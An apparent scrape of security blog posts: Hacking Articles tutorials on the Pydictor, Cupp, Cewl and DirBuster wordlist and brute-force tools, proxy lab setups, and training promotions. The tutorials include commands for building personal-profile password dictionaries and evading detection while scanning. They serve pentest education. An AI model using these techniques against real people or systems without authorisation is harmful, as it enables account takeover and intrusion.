Red teams have the advantage of only needing to find one way in, while blue teams are tasked with securing all ways in and out. This one-sided advantage means that defenders have to keep a close eye on attack tactics, techniques and procedures (TTPs) and expect encryption and covert side channels to challenge existing automated controls.

After having achieved our goals, we came away with some tips for defenders that can help security teams prepare for the TTPs we used.

  • Expect to see the use of client-side encryption gain more prominence in adversarial workflows, and choose security controls accordingly.
  • Expect to see split-data and command channels grow in popularity among attackers, because this technique can help break automated analysis patterns employed by traditional security tools. Defenders should look into behavioral, heuristics-based detection, augmented by a fully staffed security operations center (SOC) to continuously detect split-channel operations.
  • X-Force Red encourages defensive teams to test their incident response (IR) processes against simulated attacker workflows that employ custom tooling capabilities.

What can teams do right now to get ahead of determined threat actors? Step up your security with pre-emptive action in the shape of professional penetration testing, and make sure the scope of the testing gradually covers both hardware and software. You should also consider adopting cognitive solutions to augment analysts’ capabilities and scale up as attacks grow more frequent and complex.

Listen to the X-Force Red in Action podcast series

The post Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red appeared first on Security Intelligence.

Comprehensive Guide on Pydictor – A wordlist Generating Tool

In this article we will explore another dictionary building tool “Pydictor”. These tools are always fun to work with, this is another robust tool perfect for generating custom dictionaries. The thing that stands out most about this tool is the customization options it offers, from the most common to the advance.

Table of Content

  • What is Pydictor
  • Installation
  • Numeric Dictionary
  • Lower Case Alphabet Dictionary
  • Upper Case Alphabet Dictionary
  • Numeral Coupled With Upper Case Alphabet
  • Upper Case Coupled With Lower Case Alphabet
  • Numeral Coupled With Lower Case Alphabet
  • Combining Upper Case, Lower Case and Numeral
  • Adding Static Head
  • Adding Static Tail
  • Encoding
  • Character Permutation
  • Multiple Character Group Permutation
  • Social Engineering Dictionary
  • Customizing the Social Engineering Dictionary
  • Manipulating Dictionary Complexity Filter
  • Using Plugin
  • Leet Function

What is Pydictor

Pydictor is one of those tools that both novices and pro can appreciate. It is a dictionary building tool that is great to have in your arsenal when dealing with password strength tests. The tool offers a plethora of features which can be used to create that perfect dictionary for pretty much any kind of testing situation.

Installation

Let’s get cracking, the first thing we do is download Pydictor from GitHub and run it using Python. The moment the tool is executed, the running commands are visible to see other optional arguments.

git clone https://github.com/LandGrey/pydictor.git
cd pydictor
python pydictor.py

Numeric Dictionary

We are beginning by exploring the option to create a numeric or as described by the tool, digital, dictionary. Let’s start by keeping it simple, only 5 characters long and limited to 0 – 5. We will be using the “-base” option to accomplish this.

The output is saved by default but in this case we will be saving it to “dict.txt”. The storage location will always appear after each execution. The “cat” command is used to view the output in the terminal.

python pydictor.py --len 5 5 -base d -o dict.txt

Alphabet Dictionary

We will be making a dictionary which only holds lower case alphabets, the length of the words will remain to 5 characters.

python pydictor.py --len 5 5 -base L

Upper Case Alphabet Dictionary

We will now generate a dictionary with all the same metrics as earlier with the exception of changing the base option to upper case alphabets.

The result is visible to see.

python pydictor.py --len 5 5 -base c

Numeric Coupled With Upper Case Alphabet

The base options in Pydictor can be used in conjunction with each other, in this instance we will be coupling numeric (d) and upper case alphabets (c). Let’s see what kind of output we get.

python pydictor.py --len 5 5 -base dc

Upper Case Coupled With Lower Case Alphabet

This time it’s going to be both upper and lower case alphabets together.

python pydictor.py --len 5 5 -base Lc

Numeral Coupled With Lower Case Alphabet

Let’s see what we get when we couple numerals with lower case alphabets.

python pydictor.py --len 5 5 -base dL

Combining Upper Case, lower Case and Numeral

Now let’s combine all the 3 options that we’ve been playing. We will now combine upper case, lower case and numeral. To keep the output moving quicker we will limit the word length to 3 characters.

python pydictor.py --len 3 3 -base dLc

Adding Static Head

We will now be adding a static head to all the words, note that the head is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static head in front of all the numerals.

python pydictor.py --len 5 5 --head raj -base d

Adding Static Tail

We will now be adding a static tail to all the words, note that as mentioned in the instance above, the tail is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static tail at the end of all the numerals.

python pydictor.py --len 5 5 --tail raj -base d

Encoding

Pydictor has an encode function that we can use to encode the words in the dictionary.

It gives us the option to choose from popular encoding algorithms such as Base64, DES, AES, MD5, SHA256, etc. In this instance we will be using Base64 as our algorithm of choice to encode numerals.

In the interest of thoroughness, we will first generate the numerals without encoding and then with encoding.

python pydictor.py --len 5 5 –base d

Now we see what the Base64 encoded output looks like

python pydictor.py --len 5 5 -base d --encode b64

Character Permutation

We can use a permutation of a single word, Pydictor lets us choose a word and churn out as many permutations of it as possible.

python pydictor.py -char raj

Multiple Character Group Permutation

We’ll take Pydictor’s permutation prowess one step further by using the “-chunk” option.

This time we will be giving it multiple group of characters which it will take and churn out as many permutations as possible. It begins in a subtle way by just manipulating one word and then gradually moves on to the others. Notice the progression in the screenshot below.

python pydictor.py -chunk abc ABC 666 . _ @ "'

Social Engineering Dictionary

Pydictor comes with an inbuilt social engineering dictionary builder that lets testers input information from profiling an individual to get a custom tailored dictionary. We run the “help desc” within the social engineering dictionary builder option to see the various defaults it has to offer.

python pydictor.py --sedb

Customizing the Social Engineering Dictionary

show option” is used within the social engineering dictionary builder to set the various vectors from profiling a target to generate a target specific dictionary. In this instance we will only be inputting the name, birth date, and email and phone number. The vectors are set using the “set” command.

Let’s see what our social engineering dictionary output looks like.

Manipulating Dictionary Complexity Filter

We will be doing two things in this instance, we will be extending a dictionary based on a rule and separating words filtered according to complexity level. The complexity level is set to 3 by default, we will take it up a notch by setting it to 4. The character length is set to a minimum of 1 and a maximum of 6.

We view the latter part of the output.

python pydictor.py -extend raj --level 4 --len 1 6

Using Plugin

Pydictor has plugins built into it by default, we will be suing a plugin that bases its generation on the last 6 digits of a Chinese resident ID card number. We will filter it using the “-occur” function. The occur option lets us defines with the following; letter, numeral and special character, in that order. We will only be looking for results that have numerals occurring 4 times or more in a single string.

python pydictor.py -plug pid6 --types ">=0" ">=4" ">=0"

Leet Function

The leet function can selectively substitute numerals or special characters in the place of alphabets to illustrate; leet turns to L331. We will be using the leet function in conjunction with the occur option and extend function.

This is a more complex ask that we have made from Pydictor than our earlier instances, let’s see what our output looks like.

python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10" ">0" "<=2"

We hope you enjoyed our little walkthrough of Pydictor. As mentioned earlier, dictionary generators are always a handy thing to have in your arsenal of pentesting tools. This tool is gives the user a lot of advance options which can a bit overwhelming unless the user has a very clear picture of what they want out of this tool.

Don’t be afraid of taking Pydictor for a spin and see what more you can derive out of it.

Stay tuned for more articles on the latest and greatest in hacking.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Pydictor – A wordlist Generating Tool appeared first on Hacking Articles.

Professionally Evil Insights: Spring Break without Breaking the Bank: Hands On Training

Over the last eight years, one of the main focuses of Secure Ideas has been education.  One responsibility we take very seriously is that of growing the skills within our clients and the public, with the objective of raising the bar in security.  This mindset and core passion of Secure Ideas is because we all believe that we stand on the shoulders of giants. As each of us has grown into the roles we currently hold, we were not only shaped and developed by our own experiences, but also by the knowledge shared by others.  This desire to learn and grow is one of the main things that make me proud to be a part of the security community.

However, there are a couple of significant problems with our industry:  First, information security needs are growing faster than skilled personnel are learning.  Second, the cost of training has increased outrageously over the past decade.

The first issue has been discussed for almost as long as I have been involved in information security.  Even Alan Paller of the SANS Institute has been speaking about the skills gap for over a decade!  The second issue is even worse as it makes it harder to fix the first.  Training costs for a single class often exceed $5000 without even factoring in travel and the time away from work. So how do we fix this?

At Secure Ideas, we have decided that it is our responsibility as active practitioners to help fix this lack of affordable training and help address the skills gap.  To that end, we are committed to the following for 2019:

  1. First, we want to announce our Professionally Evil Spring Break event.  This 3-day event will host two classes; Professionally Evil Network Security and Professionally Evil Application Security.  The first will focus on network penetration testing and the second focuses on application security and assessments. Either class is only $750, discounted to an early bird price of $600 until January 18, 2019.  Moreover veterans, active duty military and first responders get either for 50% off.
  2. Second, our Secure Ideas Training site has recorded classes starting at $25 each and vets get them for free!  And our webcasts will continue to be run as often as we can.
  3. Third, we will continue to support and release our open-source training products such as SamuraiWTF and the Professionally Evil Web Penetration Testing 101 course.

We hope that together we can all help increase the skills of our industry and provide affordable training for all.  Let us know if you have any questions or if you would like us to run a private training for your organization.



Professionally Evil Insights

Comprehensive Guide on Cupp– A wordlist Generating Tool

Hello Friends!! Today we are going explore the function of Cupp which is an authoritative tool that creates a wordlist especially particular for a person that can be use while making brute force attack for guessing login credential.

Table of Content

  • Introduction to Cupp
  • How Cupp Works
  • Getting Started
  • Generating Custom Dictionary
  • Adding to Custom Dictionary
  • Downloading Dictionaries from Cupp Repository 
  • Downloading Default Usernames and Passwords
  • Quiet Mode

Introduction to Cupp

Cupp stand for Common User Passwords Profiler and this tool can be used in many circumstances like license penetration tests or forensic crime investigations, CUPP is a cross platform and written in Python and it’s functioning is simple but with very powerful results. This application is a social engineers best friend when it comes to crating targeted password dictionaries which are tailored to an individual.

How Cupp Works

Cupp takes vectors from the profiling done for an individual, such as their nick name, pets name, child’s birthdate, etc. It works on the principle that a password is, more often, a combination of things known to an individual. These known thing are often personal details that are very close to person’s heart.

In cases when a person might use special notations in place of alphabets (e.g: leet can be written as 133t) Cupp has you covered.

Installation and Configuration

Cupp can be downloaded from GitHub using the “git clone” command. Winthin the downloaded Cupp folder, run the “cup.py” file. Once the file is run, the program shows you the various options it has to offer.

git clone https://github.com/Mebus/cupp.git
cd cup
ls
./cupp.py

Optional Arguments:

-i      Interactive questions for user password profiling

-w FILENAME      Use this option to profile existing dictionary,

-l      Download huge wordlists from repository

-a      Parse default usernames and passwords directly from Alecto DB.

Project Alecto uses purified databases of Phenoelit and CIRT which merged and enhanced.

-v      Version of the program

Generating Custom Dictionary

Now it’s time to have some fun!

We will be using the interactive option to generate the custom dictionary. You will see that we have the option to input options such as pet’s name, child’s name, partners nickname, etc. All these things are highly personal and very common to find these things in a password, one way or another.

There’s also an option to add any specific keywords, special characters and random numbers. Apart from all this, there’s the option to activate Leet mode, this will make the generated dictionary extremely effective.

That’s all, the dictionary now gets made and saved.

./cupp.py -i

Adding to Custom Dictionary

Cupp gives us the option to add more words to our created dictionary. We can customize the kind of words we would like to add by using the provided options.

./cupp.py -w raj.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root/cupp /raj.txt.cupp.txt

Downloading Dictionaries from Cupp Repository 

Cupp has its own repositories of dictionaries which are pre classified. These dictionaries can be downloaded and used. The downloaded files are compressed and have to be uncompressed to be viewed.

Enter the number to choose name to select dictionary you want to download, we have pressed 16 and downloaded to view a dictionary of Hindi names.

./cupp.py –l
cd directories
cd hindi
gzip -d hindu-names.gz
cat hidu-names

Downloading Default Usernames and Passwords

Cupp can download premade dictionaries holding the most common usernames and passwords from the project Alecto database for usage.

./cupp.py –a
ls
cat alectodb-password.txt

Quiet Mode

Quiet mode is for running Cupp in a more hush-hush way. If you’re the kind of person who does not want a big banner on their screen showing everyone what you’re doing, you’ll like this option. This basically makes for a cleaner screen while cup is carrying out the commands you’re giving it, without the funny cow popping up on top.

We’re going the couple the quite mode option with the dictionary download option that we demonstrated above.

./cupp.py -a -q

We hope you enjoyed this basic walkthrough of the Cupp application. It is a very handy and easy to use tool when it comes to making custom dictionaries. Go ahead and see if it can guess your password.

Stay tuned for more articles on the latest and greatest in hacking!!!

 

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Cupp– A wordlist Generating Tool appeared first on Hacking Articles.

Top 10 Skills Every Purple Teamer Must Have

Today, cyber threats are created faster and are in a more sophisticated manner than ever before. Bad actors are ready to go the extra mile to get their hands on all types of organizations, industries, and information. So, in a hyper-connected world where everyone is a target, what are the top skills purple teamers need to have? Find out.
Top 10 Skills Every Purple Teamer Must Have
  1. Web Application Penetration Testing — It is the process of using penetration testing techniques on a web application to detect its vulnerabilities before cybercriminals do.
  2. Mobile Penetration Testing — Mobile apps are becoming an increasing asset for businesses, but a threat at the same time. To make sure customers’ data is secure, mobile apps need to be tested for vulnerabilities as well.
  3. WiFi Penetration Testing —  A compromised wifi puts an entire’s organization network at risk. WiFi penetration testing is a crucial skill for IT Security professionals in 2018, and hiring managers know it.
  4. Advanced Social Engineering — Knowing the various means by which attackers can use social engineering techniques to gain access to an organization’s data is a great skill for all security professionals. You’ll need to be aware of the psychology and technical elements involved in phishing, vishing, baiting, etc.
  5. Advanced Adversary Simulation — By performing security assessments that simulate adversary attacks, an organization’s security is put to the test — from inside out, and focused on what attackers can get access to when successfully penetrating an organization’s environment.
  6. Defense Evasion — Defense Evasion is a tactic an adversary may use to bypass an information security device in order to ‘evade’ detection, or other defenses. Needless to say, it’s a red-teamer’s essential skill too.
  7. Threat Hunting — Threat Hunting skills come with knowing how to proactively search through networks to detect and isolate advanced threats that may have evaded existing security solutions.
  8. Threat Intelligence — By knowing how to analyze internal and external threats an organization may face, you are gathering threat intelligence. This knowledge will then help you make more informed decisions on potential remediation solutions, plans, etc.
  9. Incident Response — Incident response skills come with being able to address and manage the aftermath of a security breach or cyber attack. This comes in handy in a world where an attack happens every 39 seconds on average.
  10. Endpoint Monitoring — Endpoints are typically the initial target because they provide an entry point to the network, and therefore, access to the data attackers want. Knowing how to thoroughly monitor those endpoints and detect unknown threats is a valuable skill for any IT security professional to have.
How Can You Get There?

The purple teamer training path was designed as a guide for you to become equally skilled in both advanced offensive and defensive security techniques. This training path includes the latest versions of our Penetration Testing Professional (PTP), Penetration Testing Extreme (PTX), and Threat Hunting Professional (THP) training courses. Dive into the Purple Teamer path with a free demo of each course and see for yourself!

Click on the icons below to request your free demos:

Special Offer — Until November 30, 2018

If you are just beginning in this field, or if you feel that you need to review the penetration testing basics, we’re offering a free Penetration Testing Student (PTS) training course in Elite Edition with every enrollment in the PTP training course in Elite Edition until November 30, 2018.

Learn more about this offer, or click below to get started NOW.
> GET MY FREE PTS ELITE

Connect with us on Social Media

Twitter Facebook LinkedIn Instagram

Comprehensive Guide on Dirbuster Tool

In this article, we are focusing on transient directory using Kali Linux tool Dibuster and trying to find hidden files and directories within a web server.

Table of Content

  • What is DirBuster
  • Default Mode
  • GET Request Method
  • Pure Brute Force (Numeric)
  • Single Sweep (Non-recursive)
  • Targeted Start
  • Blank Extensions
  • Search by File Type (.txt)
  • Changing DIR List
  • Following Redirects
  • Attack Through Proxy
  • Adding File Extensions
  • Evading Detective Measures (Requests Per Second)

What is DirBuster

DirBuster is an application within the Kali arsenal that is designed to brute force web and application servers. The tool can brute force directories and files. The application lets users take advantage of multi thread functionality to get things moving faster. In this article we will give you an overview of the tool and its basic functions.

Default Mode

We start DirBuster and only input http://testphp.vulnweb.com/ in the target URL field. Leave the rest of the options as they are. DirBuster will now auto switch between HEAD and GET requests to perform a list based brute force attack.

Let’s hit Start. DirBuster gets to work and starts brute forcing and we see various files and directories popping up in the result window.

GET Request Method

We will now set DirBuster to only use the GET request method. To make things go a little faster, the thread count is set to 200 and the “Go Faster” check box is checked.

In the Results – Tree View we can see findings.

Pure Brute Force (Numeric)

DirBuo perform ster allows a lot of control over the attack process, in this set we will be using only numerals to perform a pure brute force attack. This si done by selecting “Pure Brute Force” in the scanning type option and selecting “0-9” in the char set drop down menu. By default the minimum and maximum character limit is set.

In the Results – Tree View we can see findings.

Single Sweep (Non-recursive)

We will now perform a single sweep brute force where the dictionary words are used only once. To achieve this, we will unselect the “Be Recursive” checkbox.

In the Results – List View we can see findings.

Targeted Start

Further exploring the control options provided by DirBuster, we will set it up to start looking from the “admin” directory. In the “Dir to start with” field, type “/admin” and hit start.

In the Results – Tree View we can see findings.

Blank Extensions

DirBuster can also look into directories with a blank extensions, this could potentially uncover data that might be otherwise left untouched. All we do is check the “Use Blank Entension” checkbox.

We can see the processing happen and DirBuster testing to find directories with blank extensions.

Search by File Type (.txt)

We will be setting the file extension type to .txt, by doing so, DirBuster will look specifically for files with a .txt extension. Type “.txt” in the File extension field and hit start.

We can see the processing happen and DirBuster testing to find directories with a .txt extension.

Changing DIR List

We will now be changing the directory list in DirBuster. Options > Advance Options > DIrBuster Options > Dir list to use. Here is where we can browse and change the list to “directory-list-2.3-medium.txt”, found at /usr/share/dirbuster/wordlists/ in Kali.

We can see the word list is now set.

Following Redirects

DirBuster by default is not set to follow redirects during the attack, but we can enable this option under Options > Follow Redirects.

We can see the results in the scan information as the test progresses.

Results in the Tree View.

Attack through Proxy

DirBuster can also attack using a proxy. In this scenario we try to open a webpage at 192.168.1.108 but are denied access.

We set the IP in DirBuster as the attack target.

Before we start the attack, we setup the proxy option under Options > Advance Options > Http Options. Here we check the “Run through a proxy” checkbox, input the IP 192.168.1.108 in the Host field and set the port to 3129.

We can see the test showing results.

Adding File Extensions

Some file extensions are not set to be searched for in DirBuster, mostly image formats. We can add these to be searched for by navigating to Options > Advance Options > HTML Parsing Options.

We will delete jpeg in this instance and click OK.

In the File Extension filed we will type in “jpeg” to explicitly tell DirBuster to look for .jpeg format files.

We can see in the testing process, DirBuster is looking for and finding jpeg files.

Evading Detective Measures

Exceeding the warranted requests per second during an attack is a sure shot way to get flagged by any kind of detective measures put into place. DirBuster lets us control the requests per second to bypass this defense. Options > Advance Options > Scan Options is where we can enable this setting.

We are setting Connection Time Out to 500, checking the Limit number of requests per second and setting that field to 20.

Once the test in initiated, we will see results. The scan was stopped to show the initial findings.

Once the scan is complete the actual findings can be seen.

We hope you enjoy using this tool. It is a great tool that’s a must in a pentester’s arsenal.

Stay tuned for more articles on the latest and greatest in hacking.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Dirbuster Tool appeared first on Hacking Articles.

Comprehensive Guide on Cewl Tool

Hello Friends!! In this article we are focusing on Generating Wordlist using Kali Linux tool Cewl and learn more about its available options.

Table of Content

  • Introduction to Cewl
  • Default Method
  • Save Wordlist in a file
  • Generating Wordlist of Specific Length
  • Retrieving Emails from a Website
  • Count the number of Word Repeated in a website
  • Increase the Depth to Spider
  • Extra Debug Information
  • Verbose Mode
  • Generating Alpha-Numeric
  • Cewl with Digest/Basic Authentication
  • Proxy URL

Introduction to Cewl

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

Source : https://tools.kali.org/password-attacks/cewl

Type “cewl -h” in the terminal, it will dump all the available options it accepts along with their respective description.

SYNTAX: cewl <url> [options]

Genral Options

                -h, –help:                            Show help.

                -k, –keep:                           Keep the downloaded file.

                -d <x>,–depth <x>:        Depth to spider to, default 2.

                -m, –min_word_length: Minimum word length, default 3.

                -o, –offsite:                       Let the spider visit other sites.

                -w, –write:                         Write the output to the file.

                -u, –ua <agent>:              User agent to send.

                -n, –no-words:                                 Don’t output the wordlist.

                –with-numbers:              Accept words with numbers in as well as just letters

                -a, –meta:                          include meta data.

                –meta_file file:                                Output file for Meta data.

                -e, –email:                          Include email addresses.

                –email_file <file>:           Output file for email addresses.

                –meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.

                -c, –count:                          Show the count for each word found.

                -v, –verbose:                    Verbose.

                –debug:                              Extra debug information

                Authentication

                –auth_type:                      Digest or basic.

                –auth_user:                      Authentication username.

                –auth_pass:                      Authentication password.

               Proxy Support

                –proxy_host:                    Proxy host.

                –proxy_port:                    Proxy port, default 8080.

                –proxy_username:        Username for proxy, if required.

                –proxy_password:         Password for proxy, if required.

Default Method

Enter the following command which spiders the given url to a specified depth and print a list of words which can then be used as dictionary for cracking password.

cewl http://www.ignitetechnologies.in/

Save Wordlist in a file

For the purpose of the record maintenance, better readability and future references, we save the print list of word onto a file. To this we will use the parameter -w to save the output in a text file.

cewl http://www.ignitetechnologies.in/ -w dict.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root /dict.txt.

cat dict.txt

Generating Wordlist of Specific Length

If you want to generate wordlist of a specific word length then use -m option as it enables minimum words limit parameter.

cewl http://www.ignitetechnologies.in/ -m 9

The above command will generate a list of minimum 9 words, as you can observe in following image, it has crawl to the given website and print the list of word with minimum 9 characters.

Retrieving Emails from a Website

You can use -e option that enables email parameter along with -n option that hides the list of word generated while crawling the given website.

cewl http://www.ignitetechnologies.in/ -n -e

As shown in the below image, it has successfully found 1 email-id from inside the website.

Count the number of Word Repeated in a website

If you want to count the number of words repeated several times in a website, then use -c options that enables count parameter.

cewl http://www.ignitetechnologies.in/ -c

As you can observe from the given below image that it has print the count for each word which is repeated in the given website.

Increase the Depth to Spider

If you want to increase the level of spider for generating larger list of word by enumerating more new words from the website then use -d option along with depth level number that enables depth parameter for making more intense creeping. By Default it the depth level set is 2.

cewl http://www.ignitetechnologies.in/ -d 3

Extra Debug Information

You can use -d option that enables debug mode and shows error and raw detail of website while crawling.

cewl http://www.ignitetechnologies.in/ --debug

Verbose Mode

To expand the website crawling result and for retrieving completed detail of a website, you can use -v option for verbose mode. Rather than generating wordlist, it will dump the information available on the website.

cewl http://www.ignitetechnologies.in/ -v

Generating Alpha-Numeric

If you want to generate an alpha-numeric wordlist then you can use –with-numbers option along with command.

cewl http://testphp.vulnweb.com/ --with-numbers

From the given below image you can observe, this time it has generated an alpha-numeric wordlist.

Cewl with Digest/Basic Authentication

If there is page authentication for login into website then above default will not work properly, in order to generate a wordlist you need to bypass the authentication page by using the following parameter:

–auth_type:                      Digest or basic.

–auth_user:                      Authentication username.

–auth_pass:                      Authentication password.

cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v

or

cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v

From the given below image you can observe, it has got http-response 200 and hence generated the wordlist.

Proxy URL

When any website is running behind any proxy server then cewl will not able to generate wordlist with the help of default command as shown in the given below image.

cewl -w dict.txt http://192.168.1.103/wordpress/

You can use –proxy option to enable Proxy URL parameter to generate a wordlist with the help of following command:

cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/

As you can observer in the given below image after executing 2nd command, it has successfully print the list of word as output result.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Cewl Tool appeared first on Hacking Articles.

Socks Proxy Penetration Lab Setup using Microsocks

Hello friends!! In our previous article we have disccuss “Web Proxy Penetration Lab Setup Testing using Squid” and today’s article we are going to setup SOCKS Proxy to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.

Table of Content

  • Intoduction to proxy
  • What is socks proxy
  • Difference Between Socks proxy and HTTP Proxy
  • Socks proxy Installation
  • Web Proxy Penetration Testing
  • SSH Proxy Penetration Testing
  • FTP Proxy Penetration Testing

Intoduction to Proxy

A proxy is a computer system or program that acts as a kind of middle-man or an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.

For Example: Two users say A and B both has requested to access same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.

What is SOCKS Proxy?

A SOCKS server is a all-purpose proxy server that creates a TCP connection to another server on the client’s behalf, then exchanges network packets between a client and server. The Tor onion proxy software serves a SOCKS interface to its clients. Even SSH tunnel makes all the connections as per the SOCKS protocol.

For high security you can go with SOCKS5 protocol that provides various authentication options which you cannot get with the SOCKS4 protocol.

Difference Between Socks proxy and HTTP Proxy

  • SOCKS Proxy is low-level which is designed to be an general proxy that will be able to accommodate effectively any protocol, program, or type of traffic.
  • SOCKS proxies support both TCP and UDP transfer protocols
  • SOCKS performs at Layer 5 of the OSI model SOCKS server
  • Accepts incoming client connection on TCP port 1080.
  • HTTP proxies proxy HTTP requests, while SOCKS proxies proxy socket connections
  • HTTP proxies is High-Level which are designed for a specific protocol.
  • HTTP proxies can only process requests from applications that use the HTTP protocol.
  • An HTTP proxy is for proxying HTTP or web traffic at layer 7
  • Accepts incoming client connection on HTTP port 3128.

Socks Proxy Installation

For socks proxy lab set-up we are going to download microsocks through github. MicroSocks is multithreaded, small, efficient SOCKS5 server. It’s very lightweight, and very light on resources too. Even for every client, a thread with a stack size of 8KB is spawned.

Lest’s start!!

Open the terminal with sudo rights and enter the following command:

git clone https://github.com/rofl0r/microsocks.git

Once downloading is completed run the following command for its installation:

cd microsocks
make
make install

Now execute the following command to run socks proxy on port 1080 without authentication.

microsocks -p 1080

As you can observe FTP, SSH, HTTP and Socks is running in our local machine and now let’s go for socks penetration testing on various protocol to ensure whether it is all-purpose program or not as said above.

Web Proxy Penetration Testing

Now Configuring Apache service for Web Proxy, therefore, open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add following line to implement the following rules on /html directory over localhost or Machine IP (192.168.1.103).

<Directory /var/www/html/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order deny,allow
                deny from all
        allow from 127.0.0.1 192.168.1.103
</Directory>

Now the save the file and restart the apache service with the help of following command.

service apache2 start

Now when someone try to access web services through our network i.e. 192.168.1.103, he/she will welcome by following web page

“Error 403 Forbidden- You don’t have permission to access <requested page>”.

When you face such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind proxy server.

For web Proxy penetration testing we had already set-up lab for web application server such as DVWA (Read Article from here).

Now to test whether our  proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select “Manual proxy configuration” and enter SOCKS proxy server IP address (192.168.1.103) and Port (1080) to be used for all protocol.

BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.

SSH Proxy Penetration Testing

Now configuring host.allow file for SSH Proxy therefore open /etc/host.allow file and following line to allow SSH connection on localhost IP and restrict for others.

sshd : localhost : allow
sshd : 192.168.1.103: allow
sshd : ALL: deny

Now open proxychains configuration file from the given path /etc/proxychains.conf in your kali Linux and then add following line at the bottom.

socks5 192.168.1.103 1080

Now when we try to connect with target machine via port 22 for SSH connection we got an error message “Connection reset by peer” as shown in below image after executing 1st command.

ssh pentest@192.168.1.103

When you face such type of situation where port 22 is open but you are unable to access it, hence proved the network is running behind proxy server.

But if you will use proxychains along with the command after saving the configuration as said above then you can easily connect with target network via port 22 for ssh connection as shown in below image after executing 2nd command.

proxychains ssh pentest@192.168.1.103

FTP Proxy Penetration Testing

Now configuring vsftpd.conf file for FTP Proxy therefore open /etc/vsftpd.conf file and add thefollowing line to allow FTP connection on localhost IP and restrict for others networks.

<Limit Login>
Order Allow, Deny
Allow from 127.0.0.1 192.168.1.103
Deny from all
</Limit>

Using fileZilla when we try to connect 192.168.1.103 via port 21 for accessing FTP service, we got an Error “Connection closed by server”.

When you face such type of situation where port 21 is open but you are unable to access it, hence proved the network is running behind proxy server.

But FileZilla has multi features as it offers generic proxy option that forced passive mode on FTP connection. Go to Settings > Connection > FTP and select “generic proxy” option and made the following configuration settings.

  • Choose SOCKS 5 as generic Proxy
  • Proxy HOST IP: 192.168.1.103
  • Proxy Port: 1080

Now again when you will try to connect the target machine via port 21 for accessing FTP service then you will be easily able to access it as shown in the last image.

Hence Proved the SOCKS is actually all-purpose proxy server and Hopefully, you have found this article very helpful and completely understood the working of Proxy server and other related topic cover in this article.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Socks Proxy Penetration Lab Setup using Microsocks appeared first on Hacking Articles.

Web Proxy Penetration Lab Setup Testing using Squid

In this article we are going to setup Squid to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.

Table of content

  • Introduction to Proxy Setting
  • Squid Proxy Installation
  • Squid Proxy Server Configuration
  • Configuring Apache service for Web Proxy
  • Web Proxy Penetration Testing
  • Directory Brute force Attack on Proxy Server Using DIRB Tool
  • Vulnerability Scanning on Proxy Server Using Nikto Tool
  • SQL Injection on Proxy Server Using Sqlmap Tool
  • WordPress Scanning on Proxy Server Using WPScan Tool

Introduction to Proxy Setting

A proxy is a computer system or program that acts as a kind of middle-man or an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.

For Example: Two users say A and B both has requested to access same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.

Squid Proxy Installation

Squid is a cross functional web proxy cache server application which offers proxy and cache services for HTTP, FTP, and other common network protocols such as proxying of Secure Sockets Layer (SSL) requests and caching of Domain Name Server (DNS) lookups, and implement transparent caching. Moreover it also maintains a wide variety of caching protocols.

Let’s Begin!!

Open the host file in your local machine to add localhost address and hostname, because by default squid3 search for Ubuntu as hostname for connection implementation.

Now use apt Repository to install squid3 and enter following command.

apt-get install squid3

Squid Proxy Server Configuration

Once the installation is completed, open its configuration file from the given path: /etc/squid3/squid.conf

With Squid’s access control, you may possibly shape use of Internet services proxy by Squid to be accessible only employers with specific IP addresses.

Suppose you want to grant access by users of the 192.168.1.0/24 subnetwork only, then add the following line to the  ACL section of the squid.conf file:

acl lan src 192.168.1.0/24

Now give permission to your clients to access HTTP service over local network.

http_access allow lan

To set your Squid server to listen on the default TCP port 3128, change the http_port directive as given below:

http_port 3128

Then add following roles for squid after adding HTTP_Port

request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all

 

You can Set forwarded_for :-     on|off|transparent|truncate|delete

  1. If set to “on”, Squid will append your client’s IP address in the HTTP requests it forwards. By default it looks like:

X-Forwarded-For: 192.1.2.3

  1. If set to “off”, it will appear as

X-Forwarded-For: unknown

  1. If set to “transparent”, Squid will not alter the

X-Forwarded-For header in any way.

  1. If set to “delete”, Squid will delete the entire

X-Forwarded-For header.

  1. If set to “truncate”, Squid will remove all existing

 

 

 

